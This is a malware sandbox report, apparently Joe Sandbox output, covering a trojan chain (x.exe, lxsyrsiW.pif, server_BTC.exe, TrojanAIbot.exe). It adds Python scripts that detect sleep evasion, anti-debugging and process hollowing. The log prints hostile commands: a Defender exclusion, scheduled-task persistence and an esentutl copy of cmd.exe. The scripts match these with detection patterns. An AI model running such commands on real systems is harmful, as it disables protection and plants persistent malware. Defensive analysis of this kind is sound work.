Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99872
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99757
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99632
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99510
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99408
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99283
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99158
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99033
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98899
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98791
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98669
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98559
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98452
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98337
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98228
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98106
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97941
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97242
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97109
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96977
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96797
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96593
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99760
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99030
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98867
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98749
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98630
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98494
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98381
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98243
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98132
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98009
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97850
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97739
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97602
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97483
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97364
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97227
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97115
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96987
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96852
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96690
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96462
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96352
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96243
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96133
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96024
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95914
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95801
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95680
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95571
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95458
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95337
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99953
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99844
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99734
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99625
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99515
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99406
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99297
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99187
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99078
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98969
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98625
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98511
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98406
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98297
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98172
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98062
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97953
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97843
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97734
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97624
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97516
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97391
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97281
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: x.exe, 00000000.00000002.2184605014.0000000000866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWFC3z
                      Source: Wisrysxl.PIF, 00000016.00000002.2339517329.0000000000611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                      Source: x.exe, 00000000.00000002.2184605014.0000000000866000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2184605014.000000000081E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Wisrysxl.PIF, 0000001B.00000002.2429455325.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                      Source: neworigin.exe, 00000009.00000002.2350888427.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\x.exeAPI call chain: ExitProcess graph end nodegraph_0-32520
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information queried: ProcessInformationJump to behavior
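The run of delays above is what sleep-based sandbox evasion looks like from the hook's side. The value 922337203685477 is TimeSpan.MaxValue expressed in whole milliseconds (Int64.MaxValue ticks divided by 10000), i.e. a wait that only ends when the process does, and the two long series that shrink by a few hundred milliseconds or less per call are a stalling loop re-issuing a slightly shorter delay each time. The script below is an added triage example, not part of the Joe Sandbox report or its tooling; it assumes the log has been flattened to "Source: <process> | Thread delayed: delay time: <ms>" lines (the separator is its own convention) and uses delay values from this report plus one constructed benign control line. One caveat for the memory-string lines in the same group: "Hyper-V RAW" next to mswsock.dll is the name of the Winsock catalog's Hyper-V socket provider, so those strings alone are weak evidence of deliberate VM detection.

```python
"""Triage of "Thread delayed" events from a sandbox behaviour log.

Added example for this report; it is not Joe Sandbox code. It assumes the
log was flattened to lines of the form
    Source: <process path> | Thread delayed: delay time: <milliseconds>
(the " | " separator is this script's own convention).
"""
import re
from collections import defaultdict

# Int64.MaxValue ticks (100 ns units) in whole milliseconds is TimeSpan.MaxValue
# as a .NET timeout: 9223372036854775807 // 10000 == 922337203685477.
TIMESPAN_MAX_MS = (2 ** 63 - 1) // 10_000

DELAY_RE = re.compile(r"^Source: (?P<src>.+?) \| Thread delayed: delay time: (?P<ms>\d+)$")

# Delay values copied from this report; the last line is a constructed benign
# control so the output shows what a non-suspicious process looks like.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 100000",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 99760",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 99030",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 98867",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 98749",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 98630",
    r"Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\benign.exe | Thread delayed: delay time: 500",  # constructed control
]


def parse_delays(lines):
    """Map each source process to its requested delays (ms), in log order."""
    delays = defaultdict(list)
    for line in lines:
        m = DELAY_RE.match(line.strip())
        if m:
            delays[m.group("src")].append(int(m.group("ms")))
    return dict(delays)


def countdown_runs(delays, min_len=5, max_step_frac=0.02):
    """Return maximal runs of strictly decreasing delays whose step is at most
    max_step_frac of the previous value: the shape of a stalling loop that
    re-issues a slightly shorter delay on every iteration."""
    runs, run = [], delays[:1]
    for prev, cur in zip(delays, delays[1:]):
        step = prev - cur
        if 0 < step <= max_step_frac * prev:
            run.append(cur)
        else:
            if len(run) >= min_len:
                runs.append(run)
            run = [cur]
    if len(run) >= min_len:
        runs.append(run)
    return runs


def triage(lines, stall_threshold_ms=60_000):
    """Per process: total finite sleep requested and the evasion patterns seen."""
    report = {}
    for src, delays in parse_delays(lines).items():
        finite = [d for d in delays if d != TIMESPAN_MAX_MS]
        findings = []
        if len(finite) != len(delays):
            findings.append("infinite wait (TimeSpan.MaxValue); thread parks until process exit")
        if sum(finite) > stall_threshold_ms:
            findings.append(f"cumulative requested sleep {sum(finite) // 1000}s exceeds "
                            f"{stall_threshold_ms // 1000}s")
        for run in countdown_runs(finite):
            findings.append(f"countdown loop: {len(run)} sleeps from {run[0]}ms down to {run[-1]}ms")
        report[src] = {"total_ms": sum(finite), "findings": findings}
    return report


if __name__ == "__main__":
    for src, info in triage(SAMPLE_LINES).items():
        print(f"{src}: {info['total_ms']} ms of finite sleep requested")
        for finding in info["findings"]:
            print("   -", finding)
```

The 60-second threshold is deliberately set below the per-sample execution budget of most sandboxes; on this report the neworigin.exe process alone requests roughly ten minutes of finite sleep, which is why the sample only shows its full behaviour when the analysis engine fakes the passage of time.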

                      Anti Debugging

                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
                      Source: C:\Users\user\Desktop\x.exe | Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED894C LoadLibraryW,GetProcAddress,FreeLibrary
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_004BF794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_10001130 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_10043F3D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 24_1_004BF794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Process token adjusted: Debug
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_004015D7 SetUnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_004015D7 SetUnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_10044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 24_1_004015D7 SetUnhandledExceptionFilter
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 24_1_004015D7 SetUnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Memory allocated: page read and write | page guard
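Not every entry in this group carries the same weight, and it helps to spell out what each one actually reads. CheckRemoteDebuggerPresent is a wrapper around NtQueryInformationProcess(ProcessDebugPort), which is also what the "Process queried: DebugPort" lines show from the kernel side; IsDebuggerPresent returns PEB.BeingDebugged; mov eax, fs:[30h] fetches the PEB pointer on x86, from which BeingDebugged and NtGlobalFlag can be read without any API call, but the same instruction also precedes ordinary lookups of ProcessHeap or the OS version; the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter triple is the shape of the Visual C++ runtime's fail-fast path; and "Process token adjusted: Debug" is SeDebugPrivilege being enabled, which .NET and PowerShell hosts do routinely. The detail that makes the x.exe check deliberate is its resolution through GetModuleHandleW and GetProcAddress: the import never appears in the import table. The classifier below is an added example with its own heuristic weights, not Joe Sandbox code; it expects "Source: <process> | <event>" lines and uses the events from this group with the trailing link text removed.

```python
"""Classify debugger-detection evidence in a sandbox behaviour log.

Added example for this report, not Joe Sandbox code. Input lines are assumed
to be flattened as "Source: <process> | <event>"; the per-technique
confidence weights are this script's own heuristics.
"""
import re

EVENT_RE = re.compile(r"^Source: (?P<src>.+?) \| (?P<event>.+)$")

# First matching rule wins for an event: (pattern, technique, confidence, what the check reads).
RULES = [
    (r"IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter", "crt-failfast", "low",
     "VC runtime fail-fast path: IsDebuggerPresent only decides whether to call TerminateProcess"),
    (r"CheckRemoteDebuggerPresent", "CheckRemoteDebuggerPresent", "high",
     "wraps NtQueryInformationProcess(ProcessDebugPort) on the current process"),
    (r"Process queried: DebugPort", "ProcessDebugPort", "high",
     "ProcessDebugPort query seen by the sandbox hook; non-zero means a debugger is attached"),
    (r"\bIsDebuggerPresent\b", "IsDebuggerPresent", "medium", "reads PEB.BeingDebugged"),
    (r"fs:\[00000030h\]", "peb-read", "low",
     "x86 TEB->PEB pointer: BeingDebugged/NtGlobalFlag reachable, but also ProcessHeap and OS version"),
    (r"Process token adjusted: Debug", "SeDebugPrivilege", "low", "normal for .NET and PowerShell hosts"),
    (r"SetUnhandledExceptionFilter", "seh-filter", "low", "usually CRT boilerplate"),
]
WEIGHT = {"high": 3, "medium": 2, "low": 1}

# Events copied from this report's Anti Debugging group, in the flattened format above.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent",
    r"Source: C:\Users\user\Desktop\x.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED894C LoadLibraryW,GetProcAddress,FreeLibrary",
    r"Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter",
    r"Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_004BF794 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_10001130 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_004015D7 SetUnhandledExceptionFilter",
    r"Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_10044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Process token adjusted: Debug",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug",
]


def classify(lines):
    """Per process: deduplicated techniques, a weighted score and a verdict."""
    per_src = {}
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        src, event = m.group("src"), m.group("event")
        found = per_src.setdefault(src, {})
        for pattern, technique, confidence, note in RULES:
            if re.search(pattern, event):
                # A real check resolved at run time hides the import from static tools.
                if confidence != "low" and "GetProcAddress" in event:
                    note += " (resolved via GetProcAddress, import not visible statically)"
                found.setdefault(technique, (technique, confidence, note))
                break
    result = {}
    for src, found in per_src.items():
        findings = list(found.values())
        score = sum(WEIGHT[c] for _, c, _ in findings)
        if any(c == "high" for _, c, _ in findings):
            verdict = "anti-debug"
        elif score >= 2:
            verdict = "ambiguous"
        else:
            verdict = "benign-looking"
        result[src] = {"score": score, "verdict": verdict, "findings": findings}
    return result


if __name__ == "__main__":
    for src, info in classify(SAMPLE_LINES).items():
        print(f"{src}: {info['verdict']} (score {info['score']})")
        for technique, confidence, note in info["findings"]:
            print(f"   - [{confidence}] {technique}: {note}")
```

Run against this report, x.exe is the only process with a high-confidence check, lxsyrsiW.pif collects only low-weight evidence that is consistent with compiler runtime code, and the .NET and PowerShell processes land at "benign-looking" on SeDebugPrivilege alone.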

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\Desktop\x.exe | Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                      Source: C:\Users\user\Desktop\x.exe | Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Section unmapped: C:\Windows\System32\conhost.exe base address: 400000
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\user\Desktop\x.exe | Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 361008
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 31C008
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3C1008
                      Source: C:\Users\user\Desktop\x.exe | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
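The x.exe to lxsyrsiW.pif lines above are the process-hollowing sequence that the "Sample uses process hollowing technique" signature keys on: memory at the child's image base 0x400000 is allocated execute/read/write, the section originally mapped at that base is unmapped, and a replacement image is written into the child; the thread-context and resume steps that follow are not in this excerpt. The report lists these events grouped by type rather than in time order, so a correlator has to match on the (source, target, base) triple rather than on sequence. For Wisrysxl.PIF against conhost.exe only an unmap is recorded, which is the negative case such a correlator must not flag. Around the hollowing sit three defence-evasion steps that deserve detections of their own: esentutl /y <src> /d <dst> /o is the copy mode of a signed Windows binary, here used to place cmd.exe as C:\Users\Public\alpha.pif; Add-MpPreference -ExclusionPath takes the persistence directory out of Defender scanning; and schtasks /create with /sc daily /ri 1 relaunches TrojanAIbot.exe from AppData\Roaming every minute. The correlator below is an added example, not Joe Sandbox code; it assumes the log is flattened as "Source: <process> | <event kind>: <details>", that image paths in those events contain no spaces (true for this sample), and uses lines from this group plus one constructed benign control.

```python
"""Correlate process-hollowing and defence-evasion events from a sandbox log.

Added example for this report, not Joe Sandbox code. Assumes lines flattened as
"Source: <process> | <event kind>: <details>" and that image paths inside the
memory and "Process created" events contain no spaces (true for this sample).
"""
import re
from collections import defaultdict

EVENT_RE = re.compile(r"^Source: (?P<src>.+?) \| (?P<kind>[A-Za-z ]+): (?P<rest>.+)$")
MEM_RE = {
    "Memory allocated": re.compile(r"^(?P<target>\S+) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$"),
    "Section unmapped": re.compile(r"^(?P<target>\S+) base address: (?P<base>[0-9A-Fa-f]+)$"),
    "Memory written": re.compile(r"^(?P<target>\S+) base: (?P<base>[0-9A-Fa-f]+)$"),
}
# Command-line rules: (finding name, regex with a "what" group naming the object affected).
CMD_RULES = [
    ("defender-exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'?(?P<what>[^']+)", re.I)),
    ("cmd-copied-under-new-name", re.compile(r"esentutl(?:\.exe)?\s+/y\s+(?P<what>\S*cmd\.exe)\s+/d\s+\S+", re.I)),
    ("schtasks-persistence-user-path",
     re.compile(r'schtasks(?:\.exe)?.*?/create.*?/tr\s+"?(?P<what>[^"]*\\(?:AppData|Public|Temp)\\[^"]*)', re.I)),
]
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "\\appdata\\roaming\\")

# Lines copied from this report's HIPS / PFW group; the last one is a constructed benign control.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\x.exe | Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write",
    r"Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Section unmapped: C:\Windows\System32\conhost.exe base address: 400000",
    r"Source: C:\Users\user\Desktop\x.exe | Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000",
    r"Source: C:\Users\user\Desktop\x.exe | Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 361008",
    r"Source: C:\Users\user\Desktop\x.exe | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o",
    r"""Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'""",
    r'Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f',
    r'Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"',
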